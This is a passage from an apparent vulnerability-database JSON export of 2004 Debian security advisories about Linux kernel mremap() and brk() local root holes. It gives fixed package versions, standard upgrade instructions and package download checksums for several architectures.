management code of Linux inside\nthe mremap(2) system call. Due to a missing function return value check\nof internal functions, a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.17-0.020226.2.woody5 for mips and mipsel kernel images.\n\nOther architectures will probably be mentioned in a separate advisory or\nare not affected (m68k).\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith the next upload of a 2.4.19 kernel image and in version\n2.4.22-0.030928.3 for 2.4.22 for the mips and mipsel architectures.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n Architecture independent components:\n\n Big endian MIPS architecture:\n\n
 Little endian MIPS architecture:\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-02-18T00:00:00", "published": "2004-02-18T00:00:00", "id": "DEBIAN:DSA-441-1:C8D41", "href": 
"https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00037.html", "title": "[SECURITY] [DSA 441-1] New Linux 2.4.17 packages fix local root exploit (mips+mipsel)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:31", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 514-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJune 4th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.20, kernel-image-2.2-sparc\nVulnerability : failing function and TLB flush\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\nCERT advisory : VU#981222\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 9woody1 of Linux 2.2 kernel images for the sparc architecture\nand in version 2.2.20-5woody3 of Linux 2.2.20 source.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 9.1 of Linux 2.2 kernel images for the sparc architecture.\n\nThis problem has been fixed for other architectures already.\n\nWe recommend that you upgrade your Linux kernel package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n
\n\n Architecture independent components:\n\n Sun Sparc architecture:\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-06-04T00:00:00", "published": "2004-06-04T00:00:00", "id": "DEBIAN:DSA-514-1:B034B", "href": 
"https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00115.html", "title": "[SECURITY] [DSA 514-1] New Linux 2.2.20 packages fix local root exploit (sparc)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:06", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 453-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 2nd, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.20, kernel-image-2.2.20-i386, kernel-image-2.2.20-reiserfs-i386, kernel-image-2.2.20-amiga, kernel-image-2.2.20-atari, kernel-image-2.2.20-bvme6000, kernel-image-2.2.20-mac, kernel-image-2.2.20-mvme147, kernel-image-2.2.20-mvme16x, kernel-patch-2.2.20-powerpc\nVulnerability : failing function and TLB flush\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nthe following versions and architectures:\n\n kernel-source-2.2.20 source 2.2.20-5woody3\n kernel-image-2.2.20-i386 i386 2.2.20-5woody5\n kernel-image-2.2.20-reiserfs-i386 i386 2.2.20-4woody1\n kernel-image-2.2.20-amiga m68k 2.2.20-4\n kernel-image-2.2.20-atari m68k 2.2.20-3\n kernel-image-2.2.20-bvme6000 m68k 2.2.20-3\n kernel-image-2.2.20-mac m68k 2.2.20-3\n kernel-image-2.2.20-mvme147 m68k 2.2.20-3\n kernel-image-2.2.20-mvme16x m68k 2.2.20-3\n kernel-patch-2.2.20-powerpc powerpc 2.2.20-3woody1\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n
 Architecture independent components:\n\n Intel IA-32 architecture:\n\n
 Motorola 680x0 architecture:\n\n
 PowerPC architecture:\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-03-02T00:00:00", "published": "2004-03-02T00:00:00", "id": "DEBIAN:DSA-453-1:4CA6B", "href": 
"https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00050.html", "title": "[SECURITY] [DSA 453-1] New Linux 2.2.20 packages fix local root exploit (i386+m68k+powerpc)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:12:59", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 444-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 20th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-image-2.4.17-ia64\nVulnerability : missing function return value check\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to a missing function return value check\nof internal functions, a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 011226.16 of ia64 kernel source and images.\n\nOther architectures are or will be mentioned in separate advisories,\nor are not affected (m68k).\n\nFor the unstable distribution (sid) this problem will be fixed in version\n2.4.24-3.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n Architecture independent components:\n\n Intel IA-64 architecture:\n\n
\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-02-20T00:00:00", "published": "2004-02-20T00:00:00", "id": "DEBIAN:DSA-444-1:58039", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00040.html", "title": "[SECURITY] [DSA 444-1] New Linux 2.4.17 packages fix local root exploit (ia64)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:19", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 456-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 6th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.19, kernel-patch-2.2.19-arm, kernel-image-2.2.19-netwinder, kernel-image-2.2.19-riscpc\nVulnerability : failing function and TLB flush\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 20040303 of 2.2 kernel images for the arm architecture.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n
 Architecture independent components:\n\n ARM architecture:\n\n
Size/MD5 checksum: 1879720 41e8e0e4b2f0797a1ffecd16d47505a1\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.19-netwinder/kernel-image-2.2.19-netwinder_20040303_arm.deb\n Size/MD5 checksum: 4017076 348d3e5be8f7ee1ac42ee0ad279497db\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.19-riscpc/kernel-image-2.2.19-riscpc_20040303_arm.deb\n Size/MD5 checksum: 1830102 ce66fad5186658470c0ffaf77f822a4c\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-03-06T00:00:00", "published": "2004-03-06T00:00:00", "id": "DEBIAN:DSA-456-1:504C8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00053.html", "title": "[SECURITY] [DSA 456-1] New Linux 2.2.19 packages fix local root exploit (arm)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:26", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 454-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 2nd, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.22, kernel-image-2.2.22-alpha\nVulnerability : failing function and TLB flush\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the 
memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nthe following versions and architectures:\n\n kernel-source-2.2.22 source 2.2.22-1woody1\n kernel-image-2.2.22-alpha alpha 2.2.22-2\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.22/kernel-source-2.2.22_2.2.22-1woody1.dsc\n Size/MD5 checksum: 661 2f5744d0e7d68932d8910d15583ed820\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.22/kernel-source-2.2.22_2.2.22-1woody1.diff.gz\n Size/MD5 checksum: 146548 51478245f5608894bbb59223172f9cb3\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.22/kernel-source-2.2.22_2.2.22.orig.tar.gz\n Size/MD5 
checksum: 19313552 af9832dc10026cf03b2682f296ccd051\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-alpha_2.2.22-2.dsc\n Size/MD5 checksum: 870 ac538b47a782ae11686e2c5d0c3bb6f5\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-alpha_2.2.22-2.tar.gz\n Size/MD5 checksum: 7451 6107bb5e1e7ae0aa4e3f9417fced0717\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.22/kernel-doc-2.2.22_2.2.22-1woody1_all.deb\n Size/MD5 checksum: 1162368 805cf7d09f69b14ebcb392038de5a6b1\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.22/kernel-source-2.2.22_2.2.22-1woody1_all.deb\n Size/MD5 checksum: 15759754 55d31894b93cb9633caaa6a0eddbf998\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-headers-2.2.22_2.2.22-2_alpha.deb\n Size/MD5 checksum: 1871248 c762109e412ef7d3e31bebb868e668ce\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-generic_2.2.22-2_alpha.deb\n Size/MD5 checksum: 2782898 99c876bdab97812cb5ebdfdb1c88d224\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-jensen_2.2.22-2_alpha.deb\n Size/MD5 checksum: 2299174 ac17d87dbb6558c83b723fb97808f721\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-nautilus_2.2.22-2_alpha.deb\n Size/MD5 checksum: 2537032 9a3194224faccec6081ee06d9926be09\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-smp_2.2.22-2_alpha.deb\n Size/MD5 checksum: 2878172 6ad070e82c301504d845692688012fed\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: 
ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-03-02T00:00:00", "published": "2004-03-02T00:00:00", "id": "DEBIAN:DSA-454-1:8FBF7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00051.html", "title": "[SECURITY] [DSA 454-1] New Linux 2.2.22 packages fix local root exploit (alpha)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:19:59", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0961", "CVE-2003-0985", "CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 475-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 5th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-image-2.4.17-hppa\nVulnerability : several vulnerabilities\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2003-0961 CAN-2003-0985 CAN-2004-0077\n\nSeveral local root exploits have been discovered recently in the Linux\nkernel. This security advisory updates the PA-RISC kernel 2.4.18 for\nDebian GNU/Linux. The Common Vulnerabilities and Exposures project\nidentifies the following problems that are fixed with this update:\n\nCAN-2003-0961:\n\n An integer overflow in brk() system call (do_brk() function) for\n Linux allows a local attacker to gain root privileges. Fixed\n upstream in Linux 2.4.23.\n\nCAN-2003-0985:\n\n Paul Starzetz discovered a flaw in bounds checking in mremap() in\n the Linux kernel (present in version 2.4.x and 2.6.x) which may\n allow a local attacker to gain root privileges. Version 2.2 is not\n affected by this bug. 
Fixed upstream in Linux 2.4.24.\n\nCAN-2004-0077:\n\n Paul Starzetz and Wojciech Purczynski of isec.pl discovered a\n critical security vulnerability in the memory management code of\n Linux inside the mremap(2) system call. Due to missing function\n return value check of internal functions a local attacker can gain\n root privileges. Fixed upstream in Linux 2.4.25 and 2.6.3.\n\nPlease note that the source package has to include a lot of updates in\norder to compile the package, which wasn't possible with the old\nsource package.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 62.1 of kernel-image-2.4.18-hppa.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 2.4.25-1 of kernel-image-2.4.25-hppa.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-hppa_62.1.dsc\n Size/MD5 checksum: 713 b04fb5bfad0a9a46fcda5e0afe95d2ac\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-hppa_62.1.tar.gz\n Size/MD5 checksum: 29943063 7c7e44c64bb8e69800469e5143e4a315\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-source-2.4.18-hppa_62.1_all.deb\n Size/MD5 checksum: 24090548 5b9c3bd3702f00b4a5f1a52d641dbb4d\n\n HP Precision architecture:\n\n 
http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-headers-2.4.18-hppa_62.1_hppa.deb\n Size/MD5 checksum: 3503082 9cd62749253e897d5b901e5018e471f7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-32_62.1_hppa.deb\n Size/MD5 checksum: 2774300 f32542b074f6a272b7c31685a2e96060\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-32-smp_62.1_hppa.deb\n Size/MD5 checksum: 2913666 878bcc9861b13e7e063dd6570aa53bdb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-64_62.1_hppa.deb\n Size/MD5 checksum: 3074252 b5e96c96b464f2740eaf08513216e205\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-64-smp_62.1_hppa.deb\n Size/MD5 checksum: 3215442 702faf5c0bf94fbcb9883c5c2601a5c4\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-04-05T00:00:00", "published": "2004-04-05T00:00:00", "id": "DEBIAN:DSA-475-1:31307", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00073.html", "title": "[SECURITY] [DSA 475-1] New Linux 2.4.18 packages fix several local root exploits (hppa)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:28:27", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0961", "CVE-2003-0985", "CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 
470-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 1st, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-image-2.4.17-hppa\nVulnerability : several vulnerabilities\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2003-0961 CAN-2003-0985 CAN-2004-0077\n\nSeveral local root exploits have been discovered recently in the Linux\nkernel. This security advisory updates the mips kernel 2.4.19 for\nDebian GNU/Linux. The Common Vulnerabilities and Exposures project\nidentifies the following problems that are fixed with this update:\n\nCAN-2003-0961:\n\n An integer overflow in brk() system call (do_brk() function) for\n Linux allows a local attacker to gain root privileges. Fixed\n upstream in Linux 2.4.23.\n\nCAN-2003-0985:\n\n Paul Starzetz discovered a flaw in bounds checking in mremap() in\n the Linux kernel (present in version 2.4.x and 2.6.x) which may\n allow a local attacker to gain root privileges. Version 2.2 is not\n affected by this bug. Fixed upstream in Linux 2.4.24.\n\nCAN-2004-0077:\n\n Paul Starzetz and Wojciech Purczynski of isec.pl discovered a\n critical security vulnerability in the memory management code of\n Linux inside the mremap(2) system call. Due to missing function\n return value check of internal functions a local attacker can gain\n root privileges. 
Fixed upstream in Linux 2.4.25 and 2.6.3.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 32.3 of kernel-image-2.4.17-hppa.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 2.4.25-1 of kernel-image-2.4.25-hppa.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.3.dsc\n Size/MD5 checksum: 713 f5b7956a75870aaff51ccb52c96a0ab2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.3.tar.gz\n Size/MD5 checksum: 29958048 44cb813807b9b1c45984fadfc18d4ba1\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-source-2.4.17-hppa_32.3_all.deb\n Size/MD5 checksum: 24109698 cefc1a3ebfce0d30f97b556ed62674d4\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-headers-2.4.17-hppa_32.3_hppa.deb\n Size/MD5 checksum: 3531296 605f593d9648fd2ab1aa2d6f106263af\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32_32.3_hppa.deb\n Size/MD5 checksum: 2737992 793396152e7dea3f9a1ea8ea10c4dbe7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32-smp_32.3_hppa.deb\n Size/MD5 checksum: 2870174 
2f2df476a902378a9efa96a79367eed2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64_32.3_hppa.deb\n Size/MD5 checksum: 3024282 1a687ccbedbba298a7e98ba7d2b20650\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64-smp_32.3_hppa.deb\n Size/MD5 checksum: 3165702 795b734b1e17a75a76c40af8f49e6ec7\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-04-01T00:00:00", "published": "2004-04-01T00:00:00", "id": "DEBIAN:DSA-470-1:2C55A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00067.html", "title": "[SECURITY] [DSA 470-1] New Linux 2.4.17 packages fix several local root exploits (hppa)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:36", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0961", "CVE-2003-0985", "CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 450-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 27th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.4.19, kernel-patch-2.4.19-mips\nVulnerability : several vulnerabilities\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2003-0961 CAN-2003-0985 CAN-2004-0077\n\nSeveral local root exploits have been discovered recently in the Linux\nkernel. 
This security advisory updates the mips kernel 2.4.19 for\nDebian GNU/Linux. The Common Vulnerabilities and Exposures project\nidentifies the following problems that are fixed with this update:\n\nCAN-2003-0961:\n\n An integer overflow in brk() system call (do_brk() function) for\n Linux allows a local attacker to gain root privileges. Fixed\n upstream in Linux 2.4.23.\n\nCAN-2003-0985:\n\n Paul Starzetz discovered a flaw in bounds checking in mremap() in\n the Linux kernel (present in version 2.4.x and 2.6.x) which may\n allow a local attacker to gain root privileges. Version 2.2 is not\n affected by this bug. Fixed upstream in Linux 2.4.24.\n\nCAN-2004-0077:\n\n Paul Starzetz and Wojciech Purczynski of isec.pl discovered a\n critical security vulnerability in the memory management code of\n Linux inside the mremap(2) system call. Due to missing function\n return value check of internal functions a local attacker can gain\n root privileges. Fixed upstream in Linux 2.4.25 and 2.6.3.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.4.19-0.020911.1.woody3 of mips images and version\n2.4.19-4.woody1 of kernel source.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith the next upload of a 2.4.19 kernel image and in version\n2.4.22-0.030928.3 for 2.4.22.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper 